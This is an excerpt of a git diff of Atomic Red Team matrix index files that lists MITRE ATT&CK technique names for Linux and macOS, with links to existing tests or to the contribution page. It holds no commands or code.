| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -27,7 +27,7 @@
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
@@ -37,7 +37,7 @@
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Overwrite Process Arguments [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bind Mounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
atomics/Indexes/Matrices/macos-matrix.md
+7 -7
View File
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
